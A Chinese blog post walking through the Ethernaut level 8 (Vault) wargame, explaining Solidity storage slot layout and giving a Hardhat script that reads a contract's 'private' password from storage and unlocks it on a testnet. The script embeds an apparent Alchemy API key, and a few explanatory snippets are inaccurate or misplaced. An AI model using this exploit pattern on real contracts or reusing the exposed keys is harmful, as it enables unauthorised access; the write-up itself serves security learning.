

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/lion.png">
  <link rel="icon" href="/img/lion.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#708090">
  <meta name="author" content="Science_Jun">
  <meta name="keywords" content="区块链 深度学习">
  
    <meta name="description" content="前情提示：本篇文章较为硬核，需读者有一定开发基础。 本篇文章将会以ethernaut中的第8和第12个例子来剖析智能合约中的私有变量。 首先给大家留个疑问：私有变量真的意味着私密不可窥探吗？  答案可以先告诉大家：当然不是！  Everything is public on  the blockchain!  在区块链中，任何东西实际上都是公开的！没有什么东西使真正私有的，即使一个变量是priv">
<meta property="og:type" content="article">
<meta property="og:title" content="区块链骇客第四讲-破解私有变量">
<meta property="og:url" content="http://nangbowan.github.io/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/index.html">
<meta property="og:site_name" content="77Brother">
<meta property="og:description" content="前情提示：本篇文章较为硬核，需读者有一定开发基础。 本篇文章将会以ethernaut中的第8和第12个例子来剖析智能合约中的私有变量。 首先给大家留个疑问：私有变量真的意味着私密不可窥探吗？  答案可以先告诉大家：当然不是！  Everything is public on  the blockchain!  在区块链中，任何东西实际上都是公开的！没有什么东西使真正私有的，即使一个变量是priv">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://nangbowan.github.io/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/1.png">
<meta property="og:image" content="http://nangbowan.github.io/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/2.png">
<meta property="og:image" content="http://nangbowan.github.io/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/3.png">
<meta property="article:published_time" content="2022-11-07T11:39:34.000Z">
<meta property="article:modified_time" content="2022-11-05T02:58:08.158Z">
<meta property="article:author" content="Science_Jun">
<meta property="article:tag" content="合约安全审计 私有变量">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://nangbowan.github.io/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/1.png">
  
  
  
  <title>区块链骇客第四讲-破解私有变量 - 77Brother</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"nangbowan.github.io","root":"/","version":"1.9.2","typing":{"enable":true,"typeSpeed":80,"cursorChar":"|","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"u6d39Kb2WhNShN3CQNE7qH6o-9Nh9j0Va","app_key":"ruyVye73kB7g6b2KZe0bFvsf","server_url":"https://u6d39kb2.lc-cn-e1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>77Brotherの技术小栈</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-map"></i>
                时间线
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" href="javascript:;" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-books"></i>
                文章
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="/categories/">
                    <i class="iconfont icon-category-fill"></i>
                    分类
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/tags/">
                    <i class="iconfont icon-tags-fill"></i>
                    标签
                  </a>
                
              </div>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/projects/">
                <i class="iconfont icon-plan"></i>
                项目
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                作者
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/article-bg.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="区块链骇客第四讲-破解私有变量"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        Science_Jun
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-11-07 19:39" pubdate>
          2022年11月7日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          56 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">区块链骇客第四讲-破解私有变量</h1>
            
            
              <div class="markdown-body">
                
                <blockquote>
<p>前情提示：本篇文章较为硬核，需读者有一定开发基础。</p>
<p>本篇文章将会以ethernaut中的第8和第12个例子来剖析智能合约中的私有变量。</p>
<p>首先给大家留个疑问：私有变量真的意味着私密不可窥探吗？</p>
</blockquote>
<p>答案可以先告诉大家：<mark>当然不是！</mark></p>
<blockquote>
<p>Everything is public on  the blockchain!</p>
</blockquote>
<p>在区块链中，任何东西实际上都是公开的！没有什么东西使真正私有的，即使一个变量是<code>private</code>或<code>internal</code>的。</p>
<h2 id="📕1-挑战-？"><a href="#📕1-挑战-？" class="headerlink" title="📕1. 挑战 ？"></a>📕1. 挑战 ？</h2><p>这是ethernaut中的第8个例子~</p>
<p>现在把需求交给你：<mark>将合约解锁，即让 locked  &#x3D; false。</mark></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.6.0;<br><br>contract Vault &#123;<br>  bool public locked;<br>  bytes32 private password;<br><br>  constructor(bytes32 _password) public &#123;<br>    locked = true;<br>    password = _password;<br>  &#125;<br><br>  function unlock(bytes32 _password) public &#123;<br>    if (password == _password) &#123;<br>      locked = false;<br>    &#125;<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>



<h2 id="📕2-思考及必要准备"><a href="#📕2-思考及必要准备" class="headerlink" title="📕2. 思考及必要准备"></a>📕2. 思考及必要准备</h2><h3 id="初步思路"><a href="#初步思路" class="headerlink" title="初步思路"></a>初步思路</h3><ol>
<li>合约改变 <code>locked</code> 的地方只有一个，那就是调用<code>unlock()</code>函数，通过password判断后修改变量；</li>
<li>那么一定绕不开的问题就是：如何破解<code>password</code>私有变量？</li>
</ol>
<blockquote>
<p>可以看到，思路极其简单，但同样的也会让人感到困惑。私有变量怎样才能破解呢？</p>
<p>先别着急，我们做一些必要的了解！</p>
</blockquote>
<h3 id="⭐状态变量在储存中的布局"><a href="#⭐状态变量在储存中的布局" class="headerlink" title="⭐状态变量在储存中的布局"></a>⭐<a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/internals/layout_in_storage.html">状态变量在储存中的布局</a></h3><blockquote>
<p>合约的状态变量是以一种紧凑的方式存储在区块链中，有时候多个值会使用同一个存储槽。除了<mark>动态大小的数组和映射哈希表</mark>，数据的存储方式是从位置 <code>0</code> 开始连续放置在存储<code>storage</code>中的。</p>
<p>并且很重要的一点就是，每一个变量都能根据它的类型来确定字节大小；</p>
</blockquote>
<h3 id="🐟存储插槽"><a href="#🐟存储插槽" class="headerlink" title="🐟存储插槽"></a>🐟存储插槽</h3><blockquote>
<p>存储大小少于32字节的多个变量将会被打包到一个存储插槽中，并且规则如下：</p>
</blockquote>
<ul>
<li><p>存储插槽的第一个变量是所有变量中占字节最小的，通常是<code>bool</code>类型的变量；</p>
<p>for example</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs solidity">(bool success1, ) = payable(attackedContract).call&#123;value: msg.value&#125;(abi.encodeWithSignature(&quot;donate(address)&quot;, address(this)));<br></code></pre></td></tr></table></figure>
</li>
<li><p>值类型只使用存储它们所需的字节数；</p>
</li>
<li><p>如果一个值类型在一个存储槽的剩余部分放不下，它将被存储在下一个存储槽；</p>
</li>
<li><p>结构体(struct) 和数组数据(array)会开启一个新存储槽；</p>
</li>
<li><p><code>constant</code>和<code>immutable</code>变量将不占用存储槽，因为它们将在编译时或部署时直接在代 码中被替换为值；</p>
</li>
</ul>
<p><mark>注：</mark>对于使用继承的合约，状态变量的排序将会从最基类合约开始确定，来自不同合约的状态变量将会共享一个存储插槽；结构体和数组中的成员变量会存储在一起，就像它们单独声明时一样地存储。</p>
<h3 id="🐟映射和动态数组（深入理解）"><a href="#🐟映射和动态数组（深入理解）" class="headerlink" title="🐟映射和动态数组（深入理解）"></a>🐟映射和动态数组（深入理解）</h3><blockquote>
<p>由于映射和动态数组不可预知大小，不能在<mark>状态变量</mark>之间存储它们。</p>
<p>相反，它们自身根据以上规则仅占用32个字节，然后他们包含的元素的存储槽的位置，是通过Keccak-256哈希计算来确定的！</p>
</blockquote>
<p>假设映射和动态数组根据上述存储规则最终可确定某个 <code>位置p</code></p>
<p><img src="/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/1.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="🌏-对于动态数组（array）"><a href="#🌏-对于动态数组（array）" class="headerlink" title="🌏 对于动态数组（array）"></a>🌏 对于动态数组（array）</h4><ol>
<li><p>插槽p会存储数组中元素的数量（字节数组和字符串除外）；</p>
</li>
<li><p>数组的元素将会从<code>keccak256(p)</code>开始，布局方式与静态大小的数组相同，一个元素接着一个元素，如果元素的长度不超过16字节，将会共享存储插槽；</p>
</li>
<li><p>动态数组会递归地应用这一规则；</p>
</li>
</ol>
<p><strong>for example</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs solidity">//SPDX-License-Identifier: Unlicense<br>pragma solidity ^0.8.0;<br>contract testArray&#123;<br> uint24[][] private data;<br>   <br>&#125;<br></code></pre></td></tr></table></figure>

<p><mark>如何确定<code>data[i][j]</code>元素的位置 ？</mark>(假设动态数组data本身存储在插槽p的位置)</p>
<p>则<code>data[i][j]</code>的槽位将是 <code>keccak256(keccak256(p) + i) + floor(j/floor(256/24))</code></p>
<p>并且可以得到槽数据中的元素内容：<code>v &gt;&gt; ((j%floor(256/24))*24)) &amp; type(uint24).max</code></p>
<h4 id="🌏对于映射（mapping）"><a href="#🌏对于映射（mapping）" class="headerlink" title="🌏对于映射（mapping）"></a>🌏对于映射（mapping）</h4><ol>
<li><p>插槽p将不会被使用（即空），但它仍是有存在必要的，以确保两个彼此挨着映射；</p>
</li>
<li><p>映射中的键<code>k</code>所对应的槽会位于<code>keccak256(h(k).p)</code>，其中<code>.</code>是连接符，<code>h</code>是一个函数；</p>
</li>
<li><p>根据键的类型<code>h</code>会对应不同的占槽（类似于定态薛定谔方程中的∇变量）</p>
<p>a. 值类型，<code>h</code>与在内存中存储值的方式相同的方式将值填充为32字节；</p>
<p>b. 字符串和字节数组，h(k) 只是未填充的数据。</p>
</li>
</ol>
<p><strong>for example</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs solidity">//SPDX-License-Identifier: Unlicense<br>pragma solidity ^0.8.0;<br><br>contract C &#123;<br>    struct S &#123; uint16 a; uint16 b; uint256 c; &#125;<br>    uint x;<br>    mapping(uint =&gt; mapping(uint =&gt; S)) data;<br>&#125;<br></code></pre></td></tr></table></figure>



<p><mark>如何确定<code>data[4][9].c</code>的位置？</mark></p>
<ol>
<li>映射本身的位置是1（前面有32字节变量x）；</li>
<li>因此<code>data[4]</code>存储在<code>keccak256(uint256(4).uint256(1))</code>槽位；</li>
<li>然而<code>data[4]</code>的类型又是一个映射，所以<code>data[4][9]</code>的数据开始于槽位<code>keccak256(uint256(9).keccak256(uint256(4).uint(1)))</code>；</li>
<li>结构S的成员c中的槽位偏移是1（因为a和b被装在一个槽位中）；</li>
<li>得到<code>data[4][9].c</code>的插槽位置是<code>keccak256(uint256(9).keccak256(uint256(4).uint256(1))) + 1</code>。</li>
</ol>
<p>🎇<strong>恭喜你顺利通过了这两个例子的学习</strong>！！</p>
<p>相信你对solidity变量的存储已经有了一定的了解，如果不怎么了解也没关系，下面给出一张对应表！</p>
<h3 id="⭐solidity基本类型与对应字节"><a href="#⭐solidity基本类型与对应字节" class="headerlink" title="⭐solidity基本类型与对应字节"></a>⭐solidity基本类型与对应字节</h3><table>
<thead>
<tr>
<th align="center">类型</th>
<th align="center">bit数</th>
<th align="center">字节数</th>
</tr>
</thead>
<tbody><tr>
<td align="center">bool</td>
<td align="center">8</td>
<td align="center">1</td>
</tr>
<tr>
<td align="center">address</td>
<td align="center">160</td>
<td align="center">20</td>
</tr>
<tr>
<td align="center">string</td>
<td align="center">8&#x2F;16&#x2F;24</td>
<td align="center">1&#x2F;2&#x2F;3(单字)</td>
</tr>
<tr>
<td align="center">uint8</td>
<td align="center">8</td>
<td align="center">1</td>
</tr>
<tr>
<td align="center">uint16</td>
<td align="center">16</td>
<td align="center">2</td>
</tr>
<tr>
<td align="center">uint256</td>
<td align="center">256</td>
<td align="center">32</td>
</tr>
<tr>
<td align="center">bytes4</td>
<td align="center">32</td>
<td align="center">4</td>
</tr>
<tr>
<td align="center">bytes16</td>
<td align="center">128</td>
<td align="center">16</td>
</tr>
<tr>
<td align="center">以此类推…</td>
<td align="center">…</td>
<td align="center">…</td>
</tr>
</tbody></table>
<blockquote>
<p>对于string类型所占的字节数，有兴趣可以用这个例子去实践下</p>
</blockquote>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs solidity">//SPDX-License-Identifier: Unlicense<br>pragma solidity 0.8.0;<br><br>contract testLength&#123;<br><br>    function getStrlen(string memory _str) public pure returns(uint256)&#123;<br>        return bytes(_str).length;<br>    &#125;<br></code></pre></td></tr></table></figure>



<h2 id="🚀3-实战"><a href="#🚀3-实战" class="headerlink" title="🚀3. 实战"></a>🚀3. 实战</h2><blockquote>
<p>回到上文留下的挑战</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.6.0;<br><br>contract Vault &#123;<br>  bool public locked;<br>  bytes32 private password;<br><br>  constructor(bytes32 _password) public &#123;<br>    locked = true;<br>    password = _password;<br>  &#125;<br><br>  function unlock(bytes32 _password) public &#123;<br>    if (password == _password) &#123;<br>      locked = false;<br>    &#125;<br>  &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<h3 id="根据上文规则"><a href="#根据上文规则" class="headerlink" title="根据上文规则"></a>根据上文规则</h3><ul>
<li><code>bool locked</code>将占据<code>插槽0</code>，因为<code>bool</code>类型只需要一个字节的存储空间，但因为下一个状态变量password需要整个32字节的槽位，因此不能够把<code>locked</code>和<code>password</code> 打包在一起；</li>
<li><code>bytes32 password</code>将占据<code>插槽1</code>，顾名思义，bytes32类型需要整个32字节。</li>
</ul>
<h3 id="💎破解脚本"><a href="#💎破解脚本" class="headerlink" title="💎破解脚本"></a>💎破解脚本</h3><blockquote>
<p>破译此合约，使用hardhat测试脚本是仅有的方式之一，同时也是最便捷的！</p>
<p>如果没有hardhat基础的同学，理解原理即可。</p>
<p>想学习hardhat安全帽的同学，可以访问我的个人博客联系我。</p>
</blockquote>
<p><mark>注意看代码注释！</mark></p>
<p><code>attackPrivate.js</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">const</span> &#123;ethers&#125; = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;hardhat&quot;</span>);<br><span class="hljs-keyword">const</span> <span class="hljs-variable constant_">APIKEY</span> = <span class="hljs-string">&quot;lty9DXUZ1zkY5nPDY-WyhvEJAejxA6lp&quot;</span><br><span class="hljs-keyword">const</span> utils = ethers.<span class="hljs-property">utils</span>;<br><span class="hljs-keyword">const</span> <span class="hljs-title class_">BigNumber</span> = ethers.<span class="hljs-property">BigNumber</span>;<br><span class="hljs-keyword">const</span> <span class="hljs-title class_">MaxUint256</span> = ethers.<span class="hljs-property">constants</span>.<span class="hljs-property">MaxUint256</span><br><br><span class="hljs-comment">//这是我们要破解的合约地址</span><br><span class="hljs-keyword">const</span> ethernaut8_address = <span class="hljs-string">&quot;0xBd0B4AF4A8A56f2B8CF4e2c76Fe4bD55579cb3D6&quot;</span><br><span class="hljs-comment">//合约abi</span><br><span class="hljs-keyword">const</span> ethernaut8_abi = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;./8abi.json&quot;</span>)<br><span class="hljs-comment">//使用alchemy作为测试节点</span><br><span class="hljs-keyword">const</span> provider  = <span class="hljs-keyword">new</span> ethers.<span class="hljs-property">providers</span>.<span class="hljs-title class_">AlchemyProvider</span>(<span class="hljs-string">&quot;maticmum&quot;</span>,<span class="hljs-variable constant_">APIKEY</span>);<br><br><br><span class="hljs-title function_">describe</span>(<span class="hljs-string">&quot;attack the private password&quot;</span>,<span class="hljs-function">()=&gt;</span>&#123;<br><br>    <span class="hljs-title function_">it</span>(<span class="hljs-string">&quot;the eighth example of ethernaut&quot;</span>,<span class="hljs-title function_">async</span>()=&gt;&#123;<br>         <span class="hljs-comment">//调用合约需要singer</span><br>         <span class="hljs-keyword">const</span> [singer] = <span class="hljs-keyword">await</span> ethers.<span class="hljs-title function_">getSigners</span>();<br>         <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(singer.<span class="hljs-property">address</span>);<br>        <span class="hljs-comment">//得到合约私有变量</span><br>        <span class="hljs-comment">//在之前的学习中，我们推出了password的所在槽位数为1，因此传入1</span><br>         <span class="hljs-keyword">const</span> password = <span class="hljs-keyword">await</span> <span class="hljs-title function_">getShortStr</span>(<span class="hljs-number">1</span>,ethernaut8_address);<br>         <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;the password is:\n&quot;</span>,password);<br><br>         <span class="hljs-comment">//实例化合约实例</span><br>         <span class="hljs-keyword">const</span> instance8 = <span class="hljs-keyword">new</span> ethers.<span class="hljs-title class_">Contract</span>(ethernaut8_address,ethernaut8_abi,provider);<br><br>         <span class="hljs-comment">//测试账户调用合约unlock方法并传入破解变量</span><br>         <span class="hljs-keyword">await</span> instance8.<span class="hljs-title function_">connect</span>(singer).<span class="hljs-title function_">unlock</span>(password)<br>         <br>         <span class="hljs-comment">//查看合约是否解锁成功</span><br>         <span class="hljs-keyword">const</span> result = utils.<span class="hljs-title function_">toUtf8String</span>(<span class="hljs-keyword">await</span> instance8.<span class="hljs-property">locked</span>);<br>         <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;the contract lock is&quot;</span>,result);<br><br><br>    &#125;)<br>&#125;)<br><br><br><span class="hljs-comment">//获取槽位数据方法函数</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">getShortStr</span>(<span class="hljs-params">slot, contractAddress</span>) &#123;<br>    <span class="hljs-keyword">const</span> paddedSlot = utils.<span class="hljs-title function_">hexZeroPad</span>(slot, <span class="hljs-number">32</span>);<br>    <span class="hljs-comment">//获取该槽位最原始数据</span><br>    <span class="hljs-keyword">const</span> storageLocation = <span class="hljs-keyword">await</span> provider.<span class="hljs-title function_">getStorageAt</span>(contractAddress, paddedSlot);<br><br>    <span class="hljs-keyword">return</span> storageLocation;<br> &#125;  <br><br></code></pre></td></tr></table></figure>



<h3 id="⭐破解代码环境配置"><a href="#⭐破解代码环境配置" class="headerlink" title="⭐破解代码环境配置"></a>⭐破解代码环境配置</h3><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">//配置脚本</span><br><span class="hljs-keyword">const</span> e = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;./test/export&quot;</span>)<br><span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;@nomicfoundation/hardhat-toolbox&quot;</span>);<br><br><span class="hljs-variable language_">module</span>.<span class="hljs-property">exports</span> = &#123;<br>  <span class="hljs-attr">solidity</span>: <span class="hljs-string">&quot;0.8.0&quot;</span>,<br><br>  <span class="hljs-attr">networks</span>: &#123;<br>    <span class="hljs-comment">//马蹄链测试网</span><br>    <span class="hljs-attr">mumbai</span>:&#123;<br>      <span class="hljs-attr">url</span>:e.<span class="hljs-property">MUMBAI_URL</span>,<br>      <span class="hljs-attr">accounts</span>: [<span class="hljs-string">`0x<span class="hljs-subst">$&#123;e.PRIVATE_KEY&#125;</span>`</span>]<br>    &#125;<br>  &#125;<br>&#125;;<br></code></pre></td></tr></table></figure>



<h3 id="⭐运行脚本命令"><a href="#⭐运行脚本命令" class="headerlink" title="⭐运行脚本命令"></a>⭐运行脚本命令</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">npx hardhat <span class="hljs-built_in">test</span> --network mumbai<br></code></pre></td></tr></table></figure>



<h3 id="🚀破解私有变量成功"><a href="#🚀破解私有变量成功" class="headerlink" title="🚀破解私有变量成功"></a>🚀破解私有变量成功</h3><p><img src="/2022/11/07/%E5%8C%BA%E5%9D%97%E9%93%BE%E9%AA%87%E5%AE%A2%E7%AC%AC%E5%9B%9B%E8%AE%B2-%E7%A0%B4%E8%A7%A3%E7%A7%81%E6%9C%89%E5%8F%98%E9%87%8F/2.png" srcset="/img/loading.gif" lazyload></p>
<h3 id><a href="#" class="headerlink" title></a></h3><p><strong>ethernaut通关截图</strong></p>
